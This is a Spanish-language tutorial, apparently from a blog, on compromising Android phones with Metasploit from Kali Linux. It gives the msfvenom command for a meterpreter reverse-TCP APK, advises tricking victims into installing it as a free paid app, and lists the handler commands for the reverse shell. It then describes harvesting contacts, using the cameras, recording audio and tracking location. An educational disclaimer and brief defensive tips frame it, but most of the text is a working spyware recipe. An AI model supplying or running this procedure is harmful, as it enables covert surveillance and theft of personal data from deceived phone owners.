Hackear Android con Metasploit


Hackear Android con Metasploit

Al ver este artículo, lo pensarás 2 veces antes de instalar aplicaciones fuera de la play store. A continuación mostraré como es posible hackear Android con Metasploit desde Kali Linux. Todo esto exclusivamente con fines educativos para convencer a las personas a no instalar aplicaciones externas y a revisar todos los permisos que éstas solicitan al momento de instalar.

Creando el virus

Lo primero que debemos hacer es crear el archivo APK que se utilizará para intervenir el equipo con Android.

Abrimos metasploit y ejecutamos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP-DE-KALI-LINUX LPORT=PUERTO-DE-KALI-LINUX R > /root/NOMBRE-DE-LA-APK.apk

Tardará algunos segundos en crear la APK y mostrará la siguiente salida.

Teniendo la APK creada, ahora es el turno de utilizar ingeniería social para obtener una victima. Por lo general este tipo de APK son subidos engañando a los usuarios que buscan aplicaciones de pago en forma gratuitas.

Como pueden ver en la imagen, esta guía ejecutará la intromisión al equipo android sólo de forma local, ya que es sólo un laboratorio para demostrar los peligros de descargar APK de desconocidos.

Cuando la victima instale la APK que creamos, le aparecerá la siguiente pantalla solicitando permisos.

Creo que nadie en su sano juicio podría aceptar la solicitud de tantos permisos a una aplicación, pero hay casos en que si se da esta opción.

Al tener instalada la APK y abrirla, la victima no verá nada más. Es hora de ingresar al equipo con metasploit.

Ingresando al equipo Android con metasploit

En nuestro Kali Linux ingresaremos a Metasploit ingresando los siguientes comandos:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP-DE-KALI-LINUX
set LPORT PUERTO-DE-KALI-LINUX
exploit

Donde el IP y el Puerto son los que ingresamos al crear el APK.

En la imagen se puede ver que ya hay una conexión establecida. Es el equipo donde acabamos de instalar y abrir el APK malicioso.

Para ver información del dispositivo, podemos ejecutar el comando sysinfo.

Para ver la lista de comandos podemos ejecutar el comando help.

La lista es bastante extensa en la cual destacan comandos para tomar fotos con ambas cámaras, grabar audios, saber la localización del dispositivo (si tiene la geolocalización activa), obtener el listado de contactos, entre otros.


Demostración de instrusión

Ahora pondré algunos ejemplos de lo que se obtiene ejecutando ciertos comandos.

Obtener listado de contactos

Al abrir el archivo de texto que creo el comando, se puede ver la lista de contactos del dispositivo.

Listar las cámaras

Con esto sabremos con qué cámaras cuenta el dispositivo y que número tienen.

Recomendaciones

Lo primero que deben hacer es desactivar el permitir la instalación de aplicaciones provenientes de fuentes desconocidas. A esto se puede acceder desde el menú Configuración, Seguridad.

Con esta medida no se podrá instalar ninguna APK que no provenga de la Play Store.

Lo siguiente es revisar los permisos que solicitan las APK incluso si estan en la Play Store. Por ejemplo si descargan una aplicación para ver el clima, sería extraño que la APK solicitara acceso a las imágenes, micrófono u otro. Tal vez podría solicitar acceso a la geolocalización.

Si creen que ya están infectados, intenten ubicar el archivo dentro de las aplicaciones de Android. El nombre del APK que crea metasploit es MainActivity, por lo que si tienen esa aplicación instalada, elimínenla.